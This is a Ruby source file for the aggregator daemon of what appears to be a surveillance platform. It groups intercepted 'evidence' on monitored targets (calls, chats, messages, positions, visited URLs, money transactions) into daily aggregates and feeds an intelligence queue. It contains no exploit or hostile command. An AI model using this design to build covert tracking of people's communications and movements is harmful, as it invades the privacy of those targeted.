#
# Aggregator processing module
#
# The evidence to be processed are queued by the workers.
#

require 'rcs-common/trace'
require 'rcs-common/fixnum'
require 'rcs-common/sanitize'
require 'rcs-common/systemstatus'

require 'fileutils'

require_relative 'peer'
require_relative 'position'
require_relative 'virtual'
require_relative 'money'

module RCS
module Aggregator

class Processor
  extend RCS::Tracer
  include SystemStatusMixin

  # Main daemon loop: drains the aggregator queue one entry at a time.
  # Returns 0 on clean shutdown (Interrupt); retries forever on any other error.
  def self.run
    # check if we are the last shard and enable the position aggregation
    # we use this technique to avoid conflicts between multiple positioners
    enable_position = RCS::DB::Shard.last == RCS::DB::Config.instance.global['SHARD']

    # FIX: dup before delete — AGGREGATOR_TYPES is a shared constant and
    # Array#delete would mutate it in place for every other user of the class
    types = AggregatorQueue::AGGREGATOR_TYPES.dup
    types.delete('position') unless enable_position

    # infinite processing loop
    loop do
      # get the first entry from the queue and mark it as processed to avoid
      # conflicts with multiple processors
      if (queued = AggregatorQueue.get_queued(types))
        entry = queued.first
        count = queued.last
        change_status(:ok, "Aggregating #{count} evidence in queue")
        trace :info, "#{count} evidence to be processed in queue"
        process entry
      else
        change_status(:ok, "Idle")
        sleep 1
      end
    end
  rescue Interrupt
    trace :info, "System shutdown. Bye bye!"
    return 0
  rescue Exception => e
    # deliberately broad rescue: the daemon must survive any error and keep
    # draining the queue (Interrupt is handled above for clean shutdown)
    trace :error, "Thread error: #{e.message}"
    trace :fatal, "EXCEPTION: [#{e.class}] " << e.backtrace.join("\n")
    retry
  end

  # Aggregate one queued evidence: load it, extract the relevant data
  # (peers, positions, urls, transactions) and update the daily aggregates.
  # Errors are logged and swallowed so a bad evidence cannot stall the queue.
  def self.process(entry)
    ev = Evidence.target(entry['target_id']).find(entry['evidence_id'])
    target = Item.find(entry['target_id'])

    trace :info, "Processing #{ev.type} evidence for target #{target.name.inspect}"

    # extract peer(s) from call, mail, chat, sms
    data = extract_data(entry['target_id'], ev)

    data.each do |datum|
      # already exist? -> update it, else -> create a new one
      type = datum[:type]

      # we need to find a document that is in the same day, same type and that have the same peer and versus
      # if not found, create a new entry, otherwise increment the number of occurrences
      params = {aid: ev.aid, day: Time.at(datum[:time]).getutc.strftime('%Y%m%d'), type: type, ev_type: ev.type}

      case type
        when :position
          params.merge!({data: {position: datum[:point]}})
          agg = aggregate_position(datum, entry, params)
        when :url
          params.merge!({data: {host: datum[:host]}})
          agg = aggregate_virtual(datum, entry, params)
        else
          params.merge!({data: {peer: datum[:peer], versus: datum[:versus], sender: datum[:sender]}})
          agg = aggregate_peer(datum, entry, params)
      end

      trace :info, "Aggregated #{target.name}: #{agg.day} #{agg.type} #{agg.count} #{agg.data.inspect}"
    end
  rescue Exception => e
    # FIX: removed stray debug `puts` of the backtrace — it duplicated the
    # trace :fatal line below and polluted stdout of the daemon
    trace :error, "Cannot process evidence: #{e.message}"
    trace :fatal, e.backtrace.join("\n")
  end

  # true when the intelligence module is licensed
  def self.check_intelligence_license
    LicenseManager.instance.check :intelligence
  end

  # Aggregate a position datum: reuse a nearby point for the same day or
  # create a new one, record the timeframe and bump the counter atomically.
  def self.aggregate_position(datum, entry, params)
    # find similar point or create a new one
    agg = PositionAggregator.find_similar_or_create_by(entry['target_id'], params.reject { |key| key == :ev_type })

    # add the timeframe to the aggregate
    agg.add_to_set(info: datum[:timeframe])

    # we have to alert the intelligence for every new timeframe saved in the aggregate
    agg.add_to_intelligence_queue if check_intelligence_license

    agg.inc(count: 1)
    agg
  end

  # Aggregate a peer datum (call/chat/message/money): find or create the daily
  # aggregate, keep the handle book in sync and bump count/size atomically.
  def self.aggregate_peer(datum, entry, params)
    # pass the peer to the Frequencer to check if a new suggested entity has to be created
    if params[:ev_type] != 'money' and check_intelligence_license
      PeerAggregator.create_suggested_peer(entry['target_id'], params)
    end

    # find the existing aggregate or create a new one
    agg = Aggregate.target(entry['target_id']).find_or_create_by(params.reject { |key| key == :ev_type })

    # if it's new, add the entry to the handle book and notify the intelligence
    if agg.count == 0
      HandleBook.insert_or_update(params[:type], datum[:peer], entry['target_id'])
      agg.add_to_intelligence_queue if check_intelligence_license
    end

    # we are sure we have the object persisted in the db
    # so we have to perform an atomic operation because we have multiple aggregators working concurrently
    agg.inc(count: 1)

    # sum up the duration (or size)
    agg.inc(size: datum[:size])

    return agg
  end

  # Aggregate a url datum: find or create the daily aggregate for the host
  # and bump the counter atomically.
  def self.aggregate_virtual(datum, entry, unique_filter)
    aggregate_class = Aggregate.target(entry['target_id'])
    agg = aggregate_class.find_or_create_by(unique_filter.reject { |key| key == :ev_type })
    agg.inc(count: 1)
    agg
  end

  # Dispatch on the evidence type and return an array of data hashes to be
  # aggregated (empty when the type is unknown or the license is missing).
  def self.extract_data(target_id, ev)
    data = []

    case ev.type
      when 'money'
        data += MoneyAggregator.extract_tx(ev)
      when 'call'
        data += PeerAggregator.extract_call(ev)
      when 'chat'
        data += PeerAggregator.extract_chat(ev)
      when 'message'
        data += PeerAggregator.extract_message(ev)
      when 'position'
        data += PositionAggregator.extract(target_id, ev) if check_intelligence_license
      when 'url'
        data += VirtualAggregator.extract(ev) if check_intelligence_license
    end

    return data
  end

end

end # Aggregator::
end # RCS::